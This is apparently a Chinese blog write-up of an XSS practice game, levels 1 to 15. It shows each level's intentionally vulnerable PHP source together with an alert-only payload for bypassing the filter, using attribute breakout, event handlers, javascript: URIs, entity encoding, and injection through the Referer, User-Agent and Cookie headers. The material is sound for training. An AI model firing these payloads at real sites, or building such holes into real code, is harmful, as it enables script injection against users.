XSSGAME小游戏(XSS学习)level1-15

最新推荐文章于 2024-08-17 21:45:24 发布
最新推荐文章于 2024-08-17 21:45:24 发布
阅读量2.5k 收藏 4
点赞数 2
分类专栏: 学习笔记 ctf刷题记录 文章标签: xss 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/125934392
版权

XSS源码下载

xssgame

本地搭建

 level1

 查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户:".$str."</h2>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/8deed969-b339-4c84-8654-b1a1e40e06de.png" width="50%"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

name 变量通过 GET 方式传入,没有任何过滤。 

payload如下

/level1.php?name=<script>alert(1)</script>

level2

 查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword  value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/688da926-8a0b-452a-9a2b-82ba919328fb.jpg"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

PHP htmlspecialchars() 函数

变量通过 GET方式传入。标签经过了htmlspecialchars()编码,但input标签没有任何过滤,所以尝试在input 标签中闭合双引号",来触发事件。

onclick:javascript事件

onclick 事件会在对象被点击时发生。

" onclick=alert('H3018') //

 输入之后点击输入框即可

 

 level3

查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/ee7a688a-d75e-4ed7-8a79-96e62d3127e2.png" width="15%"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>

变量通过 GET方式传入。标签经过了htmlspecialchars()编码,但input标签没有任何过滤,所以尝试在input 标签中闭合双引号',来触发事件。

' onclick=alert('H3018') //

 level4

查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level4.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/0d3f0d24-a861-4d20-97da-f807ea842be8.jpg"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>

在第level2的基础上,过滤了尖括号,但是在input标签中闭合双引号来构造事件来触发用不到尖括号,所以payload依旧适用

" onclick=alert('H3018') //

 level5

 查看源代码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword  value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/cb30e912-eabc-4357-89eb-49e8de1b1961.jpg"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str3)."</h3>";
?>

这里首先对传入的变量的字符转化为小写,接着过滤了<script并转换为<scr_ipt,将on转化为o_n,我们无法通过这两个方法来触发事件了,但是可以闭合双引号和标签,然后通过javascript:alert('H3018')来触发弹窗。这里实际上是把javascript:后面的代码当JavaScript来执行,并将结果值返回给当前页面。

"><a href=javascript:alert('H3018') //

点击这里

 

 level6

 查看源代码

<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/92847238-8dda-473f-9c04-83986de1472a.jpg"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>

比level5加入了许多过滤原则,但并没有对传入字符串进行转换小写处理,这里可以通过大小写绕过

payload:

" Onclick=alert('H3018') //

"><a Href=javascript:alert('H3018') //

 level7

 查看源码

<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/17532328-f4cc-4bca-b283-c7f7b5a13f80.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>

这里采用了strtolower()统一将字符串转化为小写,但str_replace()函数将匹配到的字符串转化为了空格,我们可以采用双写绕过

" oonnclick=alert('H3018') //

 level8

 查看源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/d2d2080f-746c-4276-9f63-585fc4fd4a9c.jpg" width="20%"></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>

这里对传入的字符串进行了严格的检测与过滤,但在<cente>标签中并没有对传入字符串进行htmlspecialchars()函数处理,可以尝试使用javascript这种形式触发XSS

使用HTML 实体字符编码绕过过滤

javascrip&#x74;:alert('H3018') //

 点击友情链接即可

 level9

 有友情链接,估计和上面一题差不多

查看源代码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

添加了对传入字符串的检测,直接在payload 后面添加http://

javascrip&#x74;:alert('H3018') //http://

点击友情链接

 level10

 查看源代码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

两个输出点$str没戏,经过了htmlspecialchars($str)函数处理,看$str33的输出点,这里将其隐藏了起来,手动修改掉type值

keyword=&t_sort=" type="" onclick=alert('H3018') //

 level11

 又莫得框框

查看源码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里对$str与$str00两个输入字符串都进行了处理,基本是都没戏,但并没有对$str11进行处理,我们利用bp来修改referer来触发弹窗

Referer: " type="" onclick=alert('H3018') //

 

 level12

 查看源代码

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

和上一关思路一样,只不过是USER-AGENT注入

利用bp修改USER_AGENT

User-Agent: " type="" onclick=alert('H3018') //

 

 level13

 做题好爽哈哈哈

查看源码

<?php 
setcookie("user", "call me maybe?", time()+3600);
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

COOKIE注入

利用BP

Cookie: user=" type="" onclick=alert('H3018') //

 

 level14

 查看源代码

<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

ng-include 指令用于包含外部的 HTML 文件。

包含的内容将作为指定元素的子节点。

ng-include 属性的值可以是一个表达式,返回一个文件名。

默认情况下,包含的文件需要包含在同一个域名下。

 这里可以利用其包含其他关的页面来触发弹窗

?src="level1.php?name=<img src=x onerror=alert('H3018')>"

这里源码中的https://chao.jsanhuan.cn/angular.min.js这个外部脚本文件已经不能访问了

也没在本地搭了,所以这个payload可能在本地打不通

level15

 查看源码

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src="https://dn-coding-net-tweet.codehub.cn/photo/2019/9ec67d16-a8b9-41cd-82fa-14b0c0f96e72.gif"</center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>

这里过滤了script标签页过滤了空格,可以用%0a来替代

level15.php?keyword=<img%0asrc=x%0aonerror=alert('H3018')>

 

 

H3018-R
关注
专栏目录
XSSGames
cxrpty的博客
02-25 648
实验环境: 第一关:在参数的位置输入<script>alert(1)</script>,成功来到第二关 第二关:在写参数的位置输入2"onclick="alert(1),成功闯入第三关 第三关: ...
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level
2401_84185074的博客
05-03 978
先看源码,这一关有些不一样,之前结果都是拼接到输入框中,但这关却拼接到了a标签的href属性里面,可以考虑伪协议加编码。是字母s经过html编码后的形式,编码后的内容可以绕过后端的过滤,但拼接到前端后,就会被浏览器解码,重新变回字母。,查看网页源代码,发现没有被过滤,但内容被拼接到了value属性里面,需要用双引号闭合。,查看页面源代码,发现没有被过滤,那就简单了,直接弹窗。源码中可以看到,结果被拼接到了value属性中,使用。源码中可以看到,结果被拼接到了value属性中,使用。函数替换了很多关键字。
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程
热门推荐
wangyuxiang946的博客
01-07 1万+
XSS-Game level1 XSS-Game level2 XSS-Game level3 XSS-Game level4 XSS-Game level5 XSS-Game level6 XSS-Game level7 XSS-Game level8 XSS-Game level9 XSS-Game level10 XSS-Game level11 XSS-Game level12 XSS-Game level13 XSS-Game level16 XSS-Game level17
XSS Game靶场学习
最新发布
AXDRXS的博客
08-17 1077
服务器对用户提交的数据过滤不严,导致浏览器把用户的输入当成了JS代码并直接返回给客户端执行,从而实现对客户端的攻击目的。
xss小游戏
weixin_44110913的博客
03-01 732
<p></p><p>最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
XSS-GAME小游戏
weixin_43296565的博客
09-14 179
查看源代码,没有任何过滤,直接输入,弹框进入下一关。
XSS game -xss学习
shinygod的博客
11-23 704
XSS game -xss学习
XSS-Game 通关教程,XSS-Game level1-18,XSS靶场通关教程_xss靶场level(3)
2401_84181577的博客
05-06 987
作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「专栏简介」: 此文章已录入专栏。
XSS-level(1-13)解题思路
07-13
新手学习XSS的心得和感悟
xss-labs通关详解 Level 11-15
qq_41755084的博客
10-26 1266
这一关比上一关多了一个标签,其他没有变化,先试一下上一关的注入语句。发现在t_sort的标签中的"被编码成了html实体字符,没办法正常闭合了。而t_ref的值看起来像是请求的referer头。那我们将上一关的代码从referer头处传入。页面中出现了输入框,点击该输入框,弹窗成功。
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xssgame.zip
06-10
xss小游戏靶场
有意思的游戏:Google XSS Game
横云断岭的专栏
05-31 5428
Google最近出了一个XSS的游戏: https://xss-game.appspot.com/ 我这个菜鸟看提示,花了两三个小时才全过了。。 这个游戏的规则是只要在攻击网页上弹出alert窗口就可以了。 题目页面是在iframe里嵌套的展现的,那么父窗口是如何知道iframe里成功弹出了窗口? 是这样子实现的: 题目页面加载了这个js,改写了alert函数,当alert被调
Xss小游戏通关攻略带解释
sirius的博客
08-28 5526
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 477
XSS闯关小游戏(level1~13)
xssGame
Coder的博客
01-28 180
在线练习地址: https://xss.haozi.me/ 0x00 <script>alert(1)</script> 0x01 </textarea><script>alert(1)</script><textarea> 0x02 "><script>alert(1)</script> " 0x03 <script>alert1</script> 0x04 <sv
XSS-games
weixin_43940853的博客
03-05 321
关于xss的概念什么的,这里就不赘述了 在本地搭建了一个xss靶机,都复现一遍 level1 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <script&...
XSS-labs挑战解析:从Level1到Level3的攻破策略
这篇内容主要介绍了XSS-labs的初阶挑战,包括Level1、Level2和Level3,这是一个用于学习和实践跨站脚本(XSS)攻击的在线平台。XSS攻击是网络安全领域常见的攻击手段,它允许攻击者在用户浏览器上执行恶意脚本,可能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值